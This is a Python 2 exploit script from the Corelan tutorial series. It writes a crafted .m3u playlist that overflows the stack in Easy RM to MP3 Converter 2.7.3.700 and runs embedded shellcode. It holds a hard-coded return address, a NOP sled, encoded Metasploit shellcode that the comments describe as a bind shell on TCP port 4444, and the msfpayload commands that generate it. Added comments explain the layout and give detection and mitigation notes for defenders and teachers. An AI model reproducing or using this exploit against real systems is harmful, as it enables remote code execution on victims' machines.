
exploi_5M7X_easyRM2MP3.py

#!/usr/bin/python
"""Build a crafted .m3u playlist for the stack overflow in
'Easy RM to MP3 Converter v2.7.3.700' (the Corelan tutorial part 1 case).

Everything the script does is visible below: it concatenates filler, a
hard-coded return address, a 4-byte pad, a short NOP sled, a pasted
payload and trailing padding into one string, then writes that string to
'pwn_easyRM.m3u' in the current directory.  The script itself opens no
network connection; the file does nothing until the vulnerable converter
parses it.

Reading notes (defender / educator perspective):
  * The return address is an absolute pointer into MSRMCcodec02.dll (see
    the comment above ``eip``) and the payload sits in the same stack
    buffer (ESP points into it, per the author's comments).  That only
    works while the module loads at a fixed base and the stack is
    executable - precisely what ASLR-enabled modules and DEP/NX remove,
    which is why targets like this were chosen for tutorials.
  * The generated file is easy to recognise: a 30000-byte .m3u made of
    the repeated 'PWN5M7X...' filler and long runs of 0x90 with no
    playlist entries at all.  That shape is a reasonable signature for
    file-based detections.
  * Python 2 syntax throughout (print statements, str used as a byte
    buffer, integer '/').  It does not run unmodified under Python 3.
"""

# need the struct-libs for little-endian packing
import struct

# some fancy ascii-stuff (as adviced in corelans tutorial ;P)
print """                        ______                      ____
                      /     /__ ___       ____    /   /___
              __ ____/     //  /  _\______\_  \ /   //  /_
            __\ \\    .____//      \_____   /   \/   //  //
             o/  0\____  \/  \ /   \__    /\      /0  /o
           _//__//_______/____Y_____\   / /___/\ \\__\\_
      <<<-Holy.Church.of.0xF00000000/___/--S3M73X\__\\2006-->>>"""

print "\n -= Win32-Buffer-Overflow-Exploit for 'Easy RM to MP3 Converter v2.7.3.700' =-"
print "\n corelan tutorial part1 - smtx.2010"
print " greets 2 back-track-community and CORELAN"

# building the buffer 26059 bytes till eip (depends on the path where the m3u is stored)
# Python 2 '/' on ints is floor division: (25000 + 1056)/4 == 6514, so
# len(preeip) == 3 + 4*6514 == 26059, matching the figure above.  Under
# Python 3 the expression is a float and 'str * float' raises TypeError.
preeip = 'PWN' + '5M7X' * ((25000 + 1056)/4)  # pre buffer to reach saved EIP

# overwrite saved EIP with a JMP-ESP
# Address=01D0F23A
# Message=Found JMP ESP at 0x1D0F23A (C:\Programme\Easy RM to MP3 Converter\MSRMCcodec02.dll)
# '<i' packs the address as 4 little-endian bytes (0x3a 0xf2 0xd0 0x01).
# It is an absolute address inside one specific DLL build, so the file is
# tied to that exact version and load address; with any other layout the
# converter most likely just crashes instead of being redirected.
eip = struct.pack('<i', 0x1D0F23A)     # eip

# this is to stuff another 4 bytes because of the "calling"-conventions mentioned
# here -> http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1
# and there -> http://en.wikipedia.org/wiki/X86_calling_conventions
# there are 4 bytes between ESP and our shellcode so we need this to make
# ESP pointing onto your shellcode
pad = 'FUCK'

# i make a little nopsled just to be sure of "weird" stuff to happen
nopsled = '\x90' * 10   # 0x90 is the one-byte x86 NOP; ten of them here

# BADCAHRS: \x09 = TAB, \x0a = LINEFEED, \x00 = STRING-TERMINATOR
# size for shellcode is 3937 (not tested) at least enough for what we want
# testing calc: ./msfpayload windows/exec CMD=calc.exe R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
# this is a bind-shell-code listening on TCP-Port:4444
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -t c -b '\x00\x09\x0a'
# Payload bytes as pasted (369 bytes).  They are encoder output, so nothing
# about their behaviour can be confirmed from the hex itself; the author's
# comment above (a listener on TCP/4444) is the only statement of what they
# do, and for triage purposes that is all the page establishes.
shcode = (
"\xda\xc4\xd9\x74\x24\xf4\xbf\x99\xd0\x0e\xf5\x5e\x29\xc9\xb1"
"\x56\x31\x7e\x19\x03\x7e\x19\x83\xee\xfc\x7b\x25\xf2\x1d\xf2"
"\xc6\x0b\xde\x64\x4e\xee\xef\xb6\x34\x7a\x5d\x06\x3e\x2e\x6e"
"\xed\x12\xdb\xe5\x83\xba\xec\x4e\x29\x9d\xc3\x4f\x9c\x21\x8f"
"\x8c\xbf\xdd\xd2\xc0\x1f\xdf\x1c\x15\x5e\x18\x40\xd6\x32\xf1"
"\x0e\x45\xa2\x76\x52\x56\xc3\x58\xd8\xe6\xbb\xdd\x1f\x92\x71"
"\xdf\x4f\x0b\x0e\x97\x77\x27\x48\x08\x89\xe4\x8b\x74\xc0\x81"
"\x7f\x0e\xd3\x43\x4e\xef\xe5\xab\x1c\xce\xc9\x21\x5d\x16\xed"
"\xd9\x28\x6c\x0d\x67\x2a\xb7\x6f\xb3\xbf\x2a\xd7\x30\x67\x8f"
"\xe9\x95\xf1\x44\xe5\x52\x76\x02\xea\x65\x5b\x38\x16\xed\x5a"
"\xef\x9e\xb5\x78\x2b\xfa\x6e\xe1\x6a\xa6\xc1\x1e\x6c\x0e\xbd"
"\xba\xe6\xbd\xaa\xbc\xa4\xa9\x1f\xf2\x56\x2a\x08\x85\x25\x18"
"\x97\x3d\xa2\x10\x50\x9b\x35\x56\x4b\x5b\xa9\xa9\x74\x9b\xe3"
"\x6d\x20\xcb\x9b\x44\x49\x80\x5b\x68\x9c\x06\x0c\xc6\x4f\xe6"
"\xfc\xa6\x3f\x8e\x16\x29\x1f\xae\x18\xe3\x16\xe9\xd6\xd7\x7a"
"\x9d\x1a\xe8\x6d\x01\x92\x0e\xe7\xa9\xf2\x99\x90\x0b\x21\x12"
"\x06\x74\x03\x0e\x9f\xe2\x1b\x58\x27\x0d\x9c\x4e\x0b\xa2\x34"
"\x19\xd8\xa8\x80\x38\xdf\xe5\xa0\x33\xe7\x6d\x3a\x2a\xa5\x0c"
"\x3b\x67\x5d\xad\xae\xec\x9e\xb8\xd2\xba\xc9\xed\x25\xb3\x9c"
"\x03\x1f\x6d\x83\xde\xf9\x56\x07\x04\x3a\x58\x89\xc9\x06\x7e"
"\x99\x17\x86\x3a\xcd\xc7\xd1\x94\xbb\xa1\x8b\x56\x12\x7b\x67"
"\x31\xf2\xfa\x4b\x82\x84\x03\x86\x74\x68\xb5\x7f\xc1\x96\x79"
"\xe8\xc5\xef\x64\x88\x2a\x3a\x2d\xb8\x60\x67\x07\x51\x2d\xfd"
"\x1a\x3c\xce\x2b\x58\x39\x4d\xde\x20\xbe\x4d\xab\x25\xfa\xc9"
"\x47\x57\x93\xbf\x67\xc4\x94\x95\x62"
)

# Trailing 0x90 bytes so that pad + nopsled + shcode + trigger is exactly
# 3937 bytes (the author's untested estimate of the room after EIP); with
# the 369-byte payload that is 3554 bytes.
trigger = '\x90' * ( 3937 - len(shcode) - len(nopsled) - len(pad) )

# lets put the attack-buffer together
# Layout: [26059 filler][4 ret addr][4 pad][10 NOPs][369 payload][3554 NOPs]
# = 30000 bytes in total.
# NOTE(review): the name shadows Python 2's builtin `buffer`; harmless in a
# script this short, but a different name would avoid confusion.
buffer = (preeip + eip + pad + nopsled + shcode + trigger)

# open and write evil buffer into m3u-playlist
# Plain file write into the current directory; apart from the console
# output this is the script's only side effect.
print "\n - writing " + str(len(buffer)) + " bytes into m3u-playlist"
f = open('pwn_easyRM.m3u', 'w')
f.write(buffer)
f.close()
print "   [x] done\n"

# eof